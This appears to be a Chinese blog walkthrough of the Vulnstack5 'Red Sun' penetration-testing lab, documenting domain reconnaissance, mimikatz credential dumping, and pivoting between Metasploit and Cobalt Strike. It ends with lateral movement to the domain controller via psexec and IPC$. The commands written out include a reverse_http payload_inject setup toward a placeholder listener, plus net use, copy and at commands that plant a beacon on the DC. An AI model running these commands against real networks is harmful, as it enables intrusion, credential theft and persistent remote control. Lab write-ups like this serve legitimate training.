apsry

去留无意,宠辱不惊

0%

红日靶场5-vulnstack5

红日靶场5-vulnstack5

环境配置

1
2
3
4
5
6
7
8
9
10
11
12
13
win7
sun\leo 123.com sun\Administrator dc123.com
内网:192.168.138.136 外网:192.168.43.138
启动phpstudy

2008
sun\admin 2021.com
192.168.138.138

kali
192.168.43.130


自动获取ip

image-20220325143733601

image-20220325143859758

起一下phpstudy

image-20220325144244790

外网

扫下端口

image-20220325144853724

直接传个马上去,具体就不演示了,主要是内网渗透

内网

内网信息收集

直接冰蝎连msf

image-20220325150625196

MSF会话传递到CS

MSF–>CS

首先msf拿到shell后

1
2
3
4
5
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost x.x.x.x #cs IP地址
set lport xxxx # cs 监听的端口
set session 1 # 传递的会话

image-20220325151209670

发现失败0.0,说php的不允许,百度无果,但还是记录下过程

CS–>MSF

记录记录

首先在CS上线一个shell:

点击listeners,新建一个监听器:

在这里插入图片描述

点击Attacks,选择Scripted Web Delivery,生成payload:

在这里插入图片描述

在这里插入图片描述

在目标主机上执行这条命令,CS成功上线:

在这里插入图片描述

在MSF上,创建监听:

在这里插入图片描述

这里使用的payload要和CS上使用的一致。

在CS上建立Foreign HTTP(S)监听:

在这里插入图片描述

端口一致。

然后右键选择一个CS上的会话,选择spawn:

在这里插入图片描述

选择刚才监听,msf成功上线:

在这里插入图片描述

信息收集

这边还是用CS,一般win习惯了用CS,linux习惯用msf

直接弹个shell

可以看到是有域的

image-20220325145653065

还有个138段

image-20220325150018284

systeminfo

image-20220325153055466

arp -a

可以看到138这个地址

image-20220325153142184

注入个SUN\leo,然后查看域信息

image-20220325153611049

ping下确认域管地址

image-20220325153658680

net group "domain admins" /domain

image-20220325153753699

查询域用户

image-20220325153904459

查询域内DNS记录

image-20220325154146629

mimikatz抓密码

image-20220325154314165

image-20220325154341557

fscan

扫一下138这个段

image-20220325154928618

还扫到了漏洞

image-20220325154955939

内网横向移动

DC不出网,所以需要个中转

image-20220325155330151

这边直接psexec传个DC

image-20220325155639311

image-20220325155708766

发现失败,没关防火墙,关下防火墙

image-20220325155830724

成功

image-20220325155958647

image-20220325160718974

这里横向也可以利用IPC(当密码过期时,psexec会失败)

建立IPC连接

net use \\192.168.138.138\ipc$ "dc123.com" /user:administrator

检查

net use

上传文件(这里的exe要是完整的,监听为Win7的)

copy C:\\beacon.exe \\192.168.138.138\c$

查看时间,设置计划任务(间隔时间不要太短)

net time \\192.168.138.138
at \\192.168.138.138 yy:xx:mm c:\beacon.exe